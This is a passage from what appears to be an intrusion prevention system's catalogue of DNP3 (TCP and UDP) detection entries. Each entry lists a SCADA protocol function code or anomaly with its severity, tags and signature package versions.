About this situation: DNP3 Disable Unsolicited Responses request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Enable-Unsolicited-Responses-Request

About this situation: DNP3 Enable Unsolicited Responses request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Freeze-And-Clear-No-Ack-Request

About this situation: DNP3 Freeze-And-Clear No Acknowledgement request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Freeze-And-Clear-Request

About this situation: DNP3 Freeze-And-Clear request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Freeze-At-Time-No-Ack-Request

About this situation: DNP3 Freeze-at-Time No Acknowledgement request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Freeze-At-Time-Request

About this situation: DNP3 Freeze-at-Time request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Get-File-Information-Request

About this situation: DNP3 Get File Information request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Immediate-Freeze-No-Ack-Request

About this situation: DNP3 Immediate Freeze No Acknowledgement request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Immediate-Freeze-Request

About this situation: DNP3 Immediate Freeze request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Initialize-Application-Request

About this situation: DNP3 Initialize Application request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Initialize-Data-Request

About this situation: DNP3 Initialize Data request detected
Context: DNP3 (TCP) application request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Ack

About this situation: DNP3 Link Layer Acknowledgement function code detected
Context: DNP3 (TCP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Confirmed-User-Data

About this situation: DNP3 Confirmed User Data function code detected
Context: DNP3 (TCP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Link-Status

About this situation: DNP3 Link Layer Link Status function code detected
Context: DNP3 (TCP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Nack

About this situation: DNP3 Link Layer Negative Acknowledgement function code detected
Context: DNP3 (TCP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Not-Supported

About this situation: DNP3 Link Layer Not Supported function code detected
Context: DNP3 (TCP) raw request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Obsolete-Primary-Function-Code

About this situation: DNP3 Obsolete link layer function code detected
Context: DNP3 (TCP) raw request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Obsolete-Secondary-Function-Code

About this situation: DNP3 Obsolete Link Layer function code detected
Context: DNP3 (TCP) raw request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Request-Link-Status

About this situation: DNP3 Link Layer Request Link Status function code detected
Context: DNP3 (TCP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Reserved-Primary-Function-Code

About this situation: DNP3 Reserved function code detected
Context: DNP3 (TCP) raw request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Reserved-Secondary-Function-Code

About this situation: DNP3 Link Layer reserved function code detected
Context: DNP3 (TCP) raw request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Reset-Link-States

About this situation: DNP3 Reset Link States function code detected
Context: DNP3 (TCP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Test-Link-States

About this situation: DNP3 Test Links States function code detected
Context: DNP3 (TCP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Client-Unconfirmed-User-Data

About this situation: DNP3 Unconfirmed User Data function code detected
Context: DNP3 (TCP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Ack

About this situation: DNP3 Link Layer Acknowledgement function code detected
Context: DNP3 (TCP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Confirmed-User-Data

About this situation: DNP3 Confirmed User Data function code detected
Context: DNP3 (TCP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Link-Status

About this situation: DNP3 Link Layer Link Status function code detected
Context: DNP3 (TCP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Nack

About this situation: DNP3 Link Layer Negative Acknowledgement function code detected
Context: DNP3 (TCP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Not-Supported

About this situation: DNP3 Link Layer Not Supported function code detected
Context: DNP3 (TCP) raw response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Obsolete-Primary-Function-Code

About this situation: DNP3 Obsolete link layer function code detected
Context: DNP3 (TCP) raw response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Obsolete-Secondary-Function-Code

About this situation: DNP3 Obsolete Link Layer function code detected
Context: DNP3 (TCP) raw response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Request-Link-Status

About this situation: DNP3 Link Layer Request Link Status function code detected
Context: DNP3 (TCP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Reserved-Primary-Function-Code

About this situation: DNP3 Reserved function code detected
Context: DNP3 (TCP) raw response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Reserved-Secondary-Function-Code

About this situation: DNP3 Link Layer reserved function code detected
Context: DNP3 (TCP) raw response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Reset-Link-States

About this situation: DNP3 Reset Link States function code detected
Context: DNP3 (TCP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Test-Link-States

About this situation: DNP3 Test Links States function code detected
Context: DNP3 (TCP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Link-Layer-Server-Unconfirmed-User-Data

About this situation: DNP3 Unconfirmed User Data function code detected
Context: DNP3 (TCP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Open-File-Request

About this situation: DNP3 Open File request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Operate-Request

About this situation: DNP3 Operate request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Read-Request

About this situation: DNP3 Read request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Record-Current-Time-Request

About this situation: DNP3 Record Current Time request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Request-Reserved-Function-Code

About this situation: DNP3 request with reserved function code detected
Context: DNP3 (TCP) application request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Response-Reserved-Function-Code

About this situation: DNP3 response with reserved function code detected
Context: DNP3 (TCP) application response
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Save-Configuration-Request

About this situation: DNP3 Save Configuration request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Select-Request

About this situation: DNP3 Select request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Solicited-Response

About this situation: DNP3 solicited response detected
Context: DNP3 (TCP) application response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Start-Application-Request

About this situation: DNP3 Start Application request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Stop-Application-Request

About this situation: DNP3 Stop Application request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Unsolicited-Response

About this situation: DNP3 unsolicited response detected
Context: DNP3 (TCP) application response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Warm-Restart-Request

About this situation: DNP3 Warm Restart request detected
Context: DNP3 (TCP) application request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-TCP_Write-Request

About this situation: DNP3 Write request detected
Context: DNP3 (TCP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP

About this situation: DNP3 traffic over UDP
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-759-5211
Description: DNP3 (Distributed Network Protocol) is a set of communications protocol used between components in process automation systems (SCADA). Source: Wikipedia
Back to top

DNP3-UDP-CRC-Invalid

About this situation: The CRC of the DNP3 packet is invalid
Context: DNP3 without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The CRC of the DNP3 packet is invalid.
Back to top

DNP3-UDP-Invalid-Application-Layer-Control-Byte

About this situation: The application layer control byte is not valid
Context: DNP3 without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The application layer control byte is not valid
Back to top

DNP3-UDP-Invalid-Link-Layer-Control-Byte

About this situation: The link layer control byte is not valid
Context: DNP3 without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The link layer control byte is not valid
Back to top

DNP3-UDP-Parse-Error

About this situation: DNP3 (UDP) parsing error
Context: DNP3 without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: DNP3 (UDP) parsing error
Back to top

DNP3-UDP-Reserved-Address

About this situation: The destination of the packet is a reserved address
Context: DNP3 without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The destination of the packet is a reserved address
Back to top

DNP3-UDP_Abort-File-Request

About this situation: DNP3 Abort File request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Activate-Configuration-Request

About this situation: DNP3 Activate Configuration request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Assign-Class-Request

About this situation: DNP3 Assign Class request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Authenticate-File-Request

About this situation: DNP3 Authenticate File request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Authenticate-Response

About this situation: DNP3 Authenticate response detected
Context: DNP3 (UDP) application response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Authentication-No-Ack-Request

About this situation: DNP3 Authentication No Acknowledgement request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Authentication-Request

About this situation: DNP3 Authentication request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Close-File-Request

About this situation: DNP3 Close File request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Cold-Restart-Request

About this situation: DNP3 Cold Restart request detected
Context: DNP3 (UDP) application request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Confirm-Message

About this situation: DNP3 Confirm message detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Delay-Measurement-Request

About this situation: DNP3 Delay Measurement request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Delete-File-Request

About this situation: DNP3 Delete File request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Direct-Operate-No-Ack-Request

About this situation: DNP3 Direct Operate No Acknowledgement request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Direct-Operate-Request

About this situation: DNP3 Direct Operate request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Disable-Unsolicited-Responses-Request

About this situation: DNP3 Disable Unsolicited Responses request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Enable-Unsolicited-Responses-Request

About this situation: DNP3 Enable Unsolicited Responses request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Freeze-And-Clear-No-Ack-Request

About this situation: DNP3 Freeze-And-Clear No Acknowledgement request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Freeze-And-Clear-Request

About this situation: DNP3 Freeze-And-Clear request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Freeze-At-Time-No-Ack-Request

About this situation: DNP3 Freeze-at-Time No Acknowledgement request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Freeze-At-Time-Request

About this situation: DNP3 Freeze-at-Time request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Get-File-Information-Request

About this situation: DNP3 Get File Information request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Immediate-Freeze-No-Ack-Request

About this situation: DNP3 Immediate Freeze No Acknowledgement request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Immediate-Freeze-Request

About this situation: DNP3 Immediate Freeze request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Initialize-Application-Request

About this situation: DNP3 Initialize Application request detected
Context: DNP3 (UDP) application request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Initialize-Data-Request

About this situation: DNP3 Initialize Data request detected
Context: DNP3 (UDP) application request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Ack

About this situation: DNP3 Link Layer Acknowledgement function code detected
Context: DNP3 (UDP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Confirmed-User-Data

About this situation: DNP3 Confirmed User Data function code detected
Context: DNP3 (UDP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Link-Status

About this situation: DNP3 Link Layer Link Status function code detected
Context: DNP3 (UDP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Nack

About this situation: DNP3 Link Layer Negative Acknowledgement function code detected
Context: DNP3 (UDP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Not-Supported

About this situation: DNP3 Link Layer Not Supported function code detected
Context: DNP3 (UDP) raw request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Obsolete-Primary-Function-Code

About this situation: DNP3 Obsolete link layer function code detected
Context: DNP3 (UDP) raw request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Obsolete-Secondary-Function-Code

About this situation: DNP3 Obsolete Link Layer function code detected
Context: DNP3 (UDP) raw request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Request-Link-Status

About this situation: DNP3 Link Layer Request Link Status function code detected
Context: DNP3 (UDP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Reserved-Primary-Function-Code

About this situation: DNP3 Reserved function code detected
Context: DNP3 (UDP) raw request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Reserved-Secondary-Function-Code

About this situation: DNP3 Link Layer reserved function code detected
Context: DNP3 (UDP) raw request
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, Anomalies
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Reset-Link-States

About this situation: DNP3 Reset Link States function code detected
Context: DNP3 (UDP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Test-Link-States

About this situation: DNP3 Test Links States function code detected
Context: DNP3 (UDP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Client-Unconfirmed-User-Data

About this situation: DNP3 Unconfirmed User Data function code detected
Context: DNP3 (UDP) raw request
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Ack

About this situation: DNP3 Link Layer Acknowledgement function code detected
Context: DNP3 (UDP) raw response
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description:
Back to top

DNP3-UDP_Link-Layer-Server-Confirmed-User-Data

About this situation: DNP3 Confirmed User Data function code detected
